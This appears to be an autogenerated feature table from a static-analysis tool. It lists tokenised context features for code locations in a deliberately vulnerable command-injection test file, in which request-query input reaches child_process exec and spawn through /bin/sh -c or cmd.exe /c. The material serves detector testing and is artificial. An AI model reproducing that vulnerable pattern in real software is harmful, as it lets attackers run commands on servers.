sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:23:36:33 | flag = '/c' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:23:36:33 | flag = '/c' | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:30:36:33 | '/c' | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:30:36:33 | '/c' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:30:36:33 | '/c' | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:30:36:33 | '/c' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:36:30:36:33 | '/c' | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:7:38:8 | sh | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:7:38:8 | sh | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:7:38:8 | sh | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:7:38:8 | sh | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:7:38:8 | sh | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:7:38:20 | sh | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:7:38:20 | sh | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:7:38:20 | sh | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:7:38:20 | sh | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:7:38:20 | sh | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:7:38:20 | sh = '/bin/sh' | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:7:38:20 | sh = '/bin/sh' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:7:38:20 | sh = '/bin/sh' | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:7:38:20 | sh = '/bin/sh' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:7:38:20 | sh = '/bin/sh' | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:7:38:33 | sh = '/ ... = '-c' | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:7:38:33 | sh = '/ ... = '-c' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:7:38:33 | sh = '/ ... = '-c' | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:7:38:33 | sh = '/ ... = '-c' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:7:38:33 | sh = '/ ... = '-c' | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:12:38:20 | '/bin/sh' | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:12:38:20 | '/bin/sh' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:12:38:20 | '/bin/sh' | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:12:38:20 | '/bin/sh' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:12:38:20 | '/bin/sh' | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:23:38:26 | flag | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:23:38:26 | flag | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:23:38:26 | flag | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:23:38:26 | flag | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:23:38:26 | flag | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:23:38:33 | flag | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:23:38:33 | flag | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:23:38:33 | flag | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:23:38:33 | flag | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:23:38:33 | flag | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:23:38:33 | flag = '-c' | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:23:38:33 | flag = '-c' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:23:38:33 | flag = '-c' | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:23:38:33 | flag = '-c' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:23:38:33 | flag = '-c' | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:30:38:33 | '-c' | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:30:38:33 | '-c' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:30:38:33 | '-c' | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:30:38:33 | '-c' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:38:30:38:33 | '-c' | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:5:39:5 | flag | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:5:39:5 | flag | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:5:39:5 | flag | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:5:39:5 | flag | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:5:39:5 | flag | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:5:39:5 | sh | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:5:39:5 | sh | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:5:39:5 | sh | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:5:39:5 | sh | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:5:39:5 | sh | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:5:39:6 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:5:39:6 | cp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:5:39:6 | cp | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:5:39:6 | cp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:5:39:6 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:5:39:12 | cp.spawn | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:5:39:12 | cp.spawn | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:5:39:12 | cp.spawn | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:5:39:12 | cp.spawn | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:5:39:12 | cp.spawn | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:5:39:31 | cp.spaw ... cmd ]) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:5:39:31 | cp.spaw ... cmd ]) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:5:39:31 | cp.spaw ... cmd ]) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:5:39:31 | cp.spaw ... cmd ]) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:5:39:31 | cp.spaw ... cmd ]) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:5:39:31 | exceptional return of cp.spaw ... cmd ]) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:5:39:31 | exceptional return of cp.spaw ... cmd ]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:5:39:31 | exceptional return of cp.spaw ... cmd ]) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:5:39:31 | exceptional return of cp.spaw ... cmd ]) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:5:39:31 | exceptional return of cp.spaw ... cmd ]) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:8:39:12 | spawn | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:8:39:12 | spawn | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:8:39:12 | spawn | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:8:39:12 | spawn | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:8:39:12 | spawn | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:14:39:15 | sh | CalleeFlexibleAccessPath | cp.spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:14:39:15 | sh | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:14:39:15 | sh | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:14:39:15 | sh | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:14:39:15 | sh | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:14:39:15 | sh | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:14:39:15 | sh | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:14:39:15 | sh | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:14:39:15 | sh | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:18:39:30 | [ flag, cmd ] | CalleeFlexibleAccessPath | cp.spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:18:39:30 | [ flag, cmd ] | InputArgumentIndex | 1 | +| 